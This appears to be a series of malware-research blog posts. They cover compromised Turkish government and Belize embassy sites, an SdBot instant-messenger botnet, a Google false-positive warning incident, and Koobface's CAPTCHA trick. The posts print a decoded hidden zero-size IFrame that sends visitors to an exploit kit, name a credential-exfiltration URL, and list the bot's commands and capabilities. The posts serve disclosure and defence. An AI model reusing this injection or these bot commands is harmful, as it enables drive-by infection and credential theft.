Several Turkish governmental websites have come under web attacks. The following websites have been compromised and obfuscated JavaScripts and IFrame tags have been injected into them:

http://[hidden]isar.meb.gov.tr
http://[hidden]ele.meb.gov.tr
http://[hidden]kale.meb.gov.tr
http://[hidden]lu-gsim.gov.tr
http://[hidden]zigrsh.gov.tr

Each of the IFrame tags leads to a different malicious domain which ends up downloading a variety of Trojans including infostealers, and botnet Trojans.

One of the IFrames leads to a bit interesting malicious script with a 0 detection rate in VirusTotal (We have already added a signature for this script, and it will be available in the next update).

That obfuscated script involves a great deal of HTML tags in the obfuscation routine in such a way it saves data, needed for the de-obfuscation JavaScript routine, into HTML tags.

The script then downloads a Trojan Downloader which once it runs, downloads another FTP accounts stealing Trojan. The latter searches the file system and the registry for multiple FTP clients for saved FTP accounts and sends them to a Chinese domain:
http://f97q.cn/r4/t1.php

The website of the embassy of Belize in Taiwan has been compromised and an obfuscated JavaScript has been injected into it.

After decoding, the script reveals itself as an IFrame pointing to one of the pages on the Kaohsiung Medical University website:

<iframe src="http://[HIDDEN].club.kmu.edu.tw/ice/index.php" width="0" height="0"></iframe>

We are all too familiar with the usual scenario where hackers compromise a legitimate website so that its visitors get redirected to the hacker’s own servers where the exploitation kit is hosted. The ironic thing this time is the fact that hackers didn’t redirect victims to servers of their own, but to the university website which they have compromised and installed their exploit kit (probably an ice-pack) on it, and which they have used for other compromised websites.

At the time of writing, however, the exploit-kit has been removed from the university website.

In this blog post I’ll examine a botnet attack utilizing Instant Messaging services such as AIM and Live Messenger to recruit infected computers. This botnet spreads a malicious Sdbot variant with a low detection rate; the following is a detailed technical analysis of this bot.

The Attack Vector
The Trojan itself arrives through MSN Messenger as a message with a link sent out by contacts with infected systems. Here is an example of a sent message:

Once the user clicks on the link, an executable will be downloaded into the user’s system. However, for launching the executable, the user must run it manually.

The downloaded executable is a Win32 Cabinet Self-Extractor given a name which makes it appear like an image file: IMG000985215488524-JPEG.EXE.

This Trojan has a very low detection rate according to VirusTotal. Up to the time of writing, only 7 out of 40 AV products detect this bot.

The Cabinet Self-Extractor file drops a file named d.exe, which has another packed PE file in its resource section (the file is packed with some private packer).

The decoding routine

The decoding routine of the bot (part 1).

The decoding routine of the bot (part 2).

The decoding routine of the bot (part 3).

Now, to get the new executable, we can simply dump the memory into a file and using a HexEditor, we cut the junk data from the beginning of the dump file:  

And using a tool such as Stud_PE to cut off the extra data at the end of the dump file:

Now we have the real Trojan. In a quick glance, we can clearly see it is an IRC bot and to be more accurate, it’s an SdBot which connects to an IRC server and joins a channel waiting for further commands from its operators.

The detection rate in VirusTotal gets better now, where 21 out of 40 detect this bot:

The following are the commands used by this botnet:
login || l
logout || lo
rm
download
update
gone || rmzerm3b1tch
threads || t
r.getfile
r.new
r.update || r.upd4te
msn.msg
msn.stop
aim.msg
aim.stop
trion.msg
trion.stop

Inspecting into the strings list of the new executable, we can see that the bot’s multiple functionalities include:
- Download and execute remote files
- Registry manipulation
- Services manipulation
- Opening sockets, including sending and receiving data through sockets
- Sending/Downloading data through HTTP
- Uploading/Downloading files through FTP
- DNS manipulation
- Open ports in the infected systems and hide those ports
- Retrieve TCP, UDP listener tables
- Retrieve MIB-II interface table
- Retrieve IP-to-physical address mapping table
- Add/Remove Network Connections
- Keylogging
- ARP table manipulation
- ODBC functionalities

For almost half an hour, all web searches which were performed via Google and the subsequent search results were tagged by Google with “This site may harm your computer”.

Google StopBadware service was broken, but the problem seems to have been fixed by now.

Here is a couple of screenshots showing Google reporting itself as a harmful website:

Update (2/1/09): Google explains what happened:  the bug was simply a human error.

After using Geocities as its main redirection point, Koobface worm is now taking advantage of Google’s Blogger to redirect Facebook users to malware websites.

In this latest attack, the worm sends messages to Facebook users urging them to watch a video which appears to be on Blogger. Victims of this attack will end up infecting their system with the latest Koobface worm from a fake YouTube website. In order to randomly create Blogger accounts to be used for the redirections to the malicious domains, this Koobface variant requires a little help from you, to read CAPTCHAs.

This attack uses tempting messages such as “You look so fine in this video”; here is how the messages may look like:

If the user complies with this message and clicks the proposed blogpost.com link, he will get redirected to a fake YouTube website. The fake YouTube will require the user to install an alleged “Adobe Flash Player Installer” (Flash_Update.exe) in order to be able to watch the video. Executing Flash_Update.exe will infect the system with Koobface worm.

The following details explain how this attack works:
Flash_Update.exe downloads a couple of executables: google_reg.exe and captcha.exe from aibcvienna.org, which appears to be a legitimate website compromised by the hackers, into the affected system. It’s important to note that the domain also includes other executables tailored for hi5 and Myspace users.

The file google_reg.exe attempts to create new Google accounts, where it needs the help of humans in reading the CAPTCHA. It uploads the CAPTCHA image to a server and waits for captcha.exe to download it. The captcha.exe drops a file named captcha5.dll into the Program Files directory and runs it using rundll32.exe, a system file used for executing .dll files. The dropped dll file displays a shutdown window which freezes the system and threatens the user to enter the characters seen in an image before a 3 minutes countdown timer ends. The image is in fact the CAPTCHA that google_reg.exe is waiting for to be deciphered by the victim.

Once entered, the characters will be sent back to the server where google_reg.exe is waiting for them to finish creating the blogspot.com account for later use of attacking other Facebook users.